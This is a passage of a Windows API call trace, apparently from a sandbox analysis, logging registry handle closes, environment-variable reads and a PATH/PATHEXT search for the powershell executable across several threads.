	[0346.636] RegCloseKey (hKey=0x360) returned 0x0
	[0346.636] RegCloseKey (hKey=0x35c) returned 0x0
	[0346.636] RegCloseKey (hKey=0x358) returned 0x0
	[0346.636] RegCloseKey (hKey=0x354) returned 0x0
	[0346.636] RegCloseKey (hKey=0x350) returned 0x0
	[0346.637] RegCloseKey (hKey=0x34c) returned 0x0
	[0346.637] RegCloseKey (hKey=0x348) returned 0x0
	[0346.637] RegCloseKey (hKey=0x344) returned 0x0
	[0346.637] RegCloseKey (hKey=0x394) returned 0x0
	[0346.638] RegCloseKey (hKey=0x334) returned 0x0
	[0346.638] RegCloseKey (hKey=0x330) returned 0x0
	[0346.638] RegCloseKey (hKey=0x32c) returned 0x0
	[0346.638] RegCloseKey (hKey=0x328) returned 0x0
	[0346.639] RegCloseKey (hKey=0x324) returned 0x0
	[0346.639] RegCloseKey (hKey=0x320) returned 0x0
	[0346.639] RegCloseKey (hKey=0x318) returned 0x0
	[0346.639] RegCloseKey (hKey=0x308) returned 0x0
	[0346.640] RegCloseKey (hKey=0x390) returned 0x0
	[0346.640] RegCloseKey (hKey=0x2f0) returned 0x0
	[0346.640] RegCloseKey (hKey=0x2d0) returned 0x0
	[0346.640] RegCloseKey (hKey=0x38c) returned 0x0
	[0346.640] RegCloseKey (hKey=0x388) returned 0x0
	[0346.641] RegCloseKey (hKey=0x364) returned 0x0
	[0346.641] RegCloseKey (hKey=0x3a0) returned 0x0
	[0641.681] RegCloseKey (hKey=0x334) returned 0x0

Thread:
	id = 272
	os_tid = 0xdbc


Thread:
	id = 366
	os_tid = 0xec4

	[0349.740] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0349.744] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0349.749] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.749] CoTaskMemFree (pv=0x4684b0) 
	[0349.751] VirtualQuery (in: lpAddress=0x1c87db00, lpBuffer=0x1c87e9c0, dwLength=0x30 | out: lpBuffer=0x1c87e9c0*(BaseAddress=0x1c87d000, AllocationBase=0x1bef0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.754] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.754] CoTaskMemFree (pv=0x4684b0) 
	[0349.757] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.757] CoTaskMemFree (pv=0x4684b0) 
	[0349.760] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.760] CoTaskMemFree (pv=0x4684b0) 
	[0349.786] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.786] CoTaskMemFree (pv=0x4684b0) 
	[0350.163] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.163] CoTaskMemFree (pv=0x4684b0) 
	[0350.164] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.165] CoTaskMemFree (pv=0x4684b0) 
	[0350.169] VirtualQuery (in: lpAddress=0x1c87ddb0, lpBuffer=0x1c87ec70, dwLength=0x30 | out: lpBuffer=0x1c87ec70*(BaseAddress=0x1c87d000, AllocationBase=0x1bef0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.170] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.170] CoTaskMemFree (pv=0x4684b0) 
	[0350.173] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.173] CoTaskMemFree (pv=0x4684b0) 
	[0350.173] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.174] CoTaskMemFree (pv=0x4684b0) 
	[0350.175] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.175] CoTaskMemFree (pv=0x4684b0) 
	[0350.184] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.184] CoTaskMemFree (pv=0x4684b0) 
	[0350.536] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.536] CoTaskMemFree (pv=0x4684b0) 
	[0350.538] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.538] CoTaskMemFree (pv=0x4684b0) 
	[0350.540] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.540] CoTaskMemFree (pv=0x4684b0) 
	[0350.542] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.542] CoTaskMemFree (pv=0x4684b0) 
	[0350.543] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.544] CoTaskMemFree (pv=0x4684b0) 
	[0350.545] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.545] CoTaskMemFree (pv=0x4684b0) 
	[0350.547] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.547] CoTaskMemFree (pv=0x4684b0) 
	[0350.939] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0350.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0350.939] CoTaskMemFree (pv=0x4684b0) 
	[0351.298] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0351.298] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0351.298] CoTaskMemFree (pv=0x4684b0) 
	[0351.305] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0351.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0351.305] CoTaskMemFree (pv=0x4684b0) 
	[0351.305] CoTaskMemAlloc (cb=0x128) returned 0x1b827980
	[0351.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b827980, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0351.305] CoTaskMemFree (pv=0x1b827980) 
	[0351.309] CoTaskMemAlloc (cb=0x20e) returned 0x1b8125e0
	[0351.309] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8125e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0351.309] CoTaskMemFree (pv=0x1b8125e0) 
	[0351.583] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.585] SetErrorMode (uMode=0x1) returned 0x1
	[0351.587] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.597] SetErrorMode (uMode=0x1) returned 0x1
	[0351.598] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.599] SetErrorMode (uMode=0x1) returned 0x1
	[0351.599] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.606] SetErrorMode (uMode=0x1) returned 0x1
	[0351.608] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.608] SetErrorMode (uMode=0x1) returned 0x1
	[0351.608] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.616] SetErrorMode (uMode=0x1) returned 0x1
	[0351.617] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.618] SetErrorMode (uMode=0x1) returned 0x1
	[0351.618] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0351.625] SetErrorMode (uMode=0x1) returned 0x1
	[0351.627] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0351.627] SetErrorMode (uMode=0x1) returned 0x1
	[0352.112] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.118] SetErrorMode (uMode=0x1) returned 0x1
	[0352.119] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.119] SetErrorMode (uMode=0x1) returned 0x1
	[0352.119] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.126] SetErrorMode (uMode=0x1) returned 0x1
	[0352.127] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.127] SetErrorMode (uMode=0x1) returned 0x1
	[0352.128] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.134] SetErrorMode (uMode=0x1) returned 0x1
	[0352.135] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.135] SetErrorMode (uMode=0x1) returned 0x1
	[0352.135] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.143] SetErrorMode (uMode=0x1) returned 0x1
	[0352.611] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.611] SetErrorMode (uMode=0x1) returned 0x1
	[0352.611] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.618] SetErrorMode (uMode=0x1) returned 0x1
	[0352.619] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.619] SetErrorMode (uMode=0x1) returned 0x1
	[0352.619] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.626] SetErrorMode (uMode=0x1) returned 0x1
	[0352.627] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.628] SetErrorMode (uMode=0x1) returned 0x1
	[0352.628] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.634] SetErrorMode (uMode=0x1) returned 0x1
	[0352.635] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.635] SetErrorMode (uMode=0x1) returned 0x1
	[0352.635] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.642] SetErrorMode (uMode=0x1) returned 0x1
	[0352.643] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.643] SetErrorMode (uMode=0x1) returned 0x1
	[0352.643] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0352.650] SetErrorMode (uMode=0x1) returned 0x1
	[0352.651] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0352.651] SetErrorMode (uMode=0x1) returned 0x1
	[0352.651] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.098] SetErrorMode (uMode=0x1) returned 0x1
	[0353.099] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0353.099] SetErrorMode (uMode=0x1) returned 0x1
	[0353.099] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.107] SetErrorMode (uMode=0x1) returned 0x1
	[0353.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.108] SetErrorMode (uMode=0x1) returned 0x1
	[0353.109] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.109] SetErrorMode (uMode=0x1) returned 0x1
	[0353.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.109] SetErrorMode (uMode=0x1) returned 0x1
	[0353.109] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.110] SetErrorMode (uMode=0x1) returned 0x1
	[0353.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.110] SetErrorMode (uMode=0x1) returned 0x1
	[0353.110] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.110] SetErrorMode (uMode=0x1) returned 0x1
	[0353.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.111] SetErrorMode (uMode=0x1) returned 0x1
